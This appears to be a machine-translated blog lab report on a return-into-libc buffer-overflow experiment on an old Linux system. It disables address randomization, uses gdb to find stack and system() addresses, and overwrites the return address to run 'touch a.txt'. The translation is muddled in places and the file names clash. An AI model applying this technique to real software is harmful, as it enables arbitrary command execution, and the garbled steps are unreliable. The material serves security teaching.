return-into-libc experiments (report)

Disclaimer: This article is a blogger original article, follow the CC 4.0 BY-SA copyright agreement, reproduced, please attach the original source link and this statement.

This link: https://blog.csdn.net/ALPS233/article/details/102682855

Experimental Description

return-into-libc mode (also known as arc injection) attack exploits the purpose of use can be achieved without the injection of code
- the code used to cover existing address return address, usually the address and the corresponding parameter to a function, such as system (), exec () and the like
- when returning, by calling the system (), exec () function and the like, the execution of arbitrary system command (function specified in the parameters)
- the use of return-into-libc performs a range function

lab environment:

System Environment: Linux localhost.localdomain 2.6.9-5.EL # 1 Wed Jan 5 19:22:18 EST 2005 i686 i686 i386 GNU / Linux

Gdb 环境：GNU gdb Red Hat Linux (6.1post-1.20040607.62rh) Copyright 2004 Free Software Foundation, Inc.

Experiment: realize the attack instance a return-into-libc in debugging situations, call the system () function to create a file in the current directory

Experimental operation:

1) Create a test code and compile it noted that before the experiment need to enter the command sysctl -w kernel.exec-shield = 0 // close the address randomization.
Gcc added -ggdb options #gcc -ggdb ret.c -o ret

2) gdb debugging stage, find and use the system function address.
Gdb ret enter the debug interface

gdb b 6:
Breakpoint commands, set breakpoints in the sixth line.
gdb r:
Run to the breakpoint.
According to the principle experiment, the situation is expected to stack.

Note that, since the root privilege has the specific operation of the present experiment, it is unnecessary to run the configuration seteuid (0) function.
Gdb p respectively View buff and ebp address (not necessarily keep up with buff) and the stored value in ebp address and return address

Obtained:
& Buff: 0xbffff83c; EBP Address: 0xbffff848 Ebp at the address: 0xbffff878
the Return address: 0x080483f2

Continue to use gdb to find the system function system () function first address of

the next disassembly found (leave / ret) address

Obtained: leave statement first address 0x08048388
same within the stack count
the System () function of position parameter from the first address 16 (return address address) + 3 * 4 = 28 bytes position i.e. & buff + 7 (Unit 4 bytes)

Parameters "touch a.txt":

Buff construction

results screenshot:

successfully created hello file, complete exploits!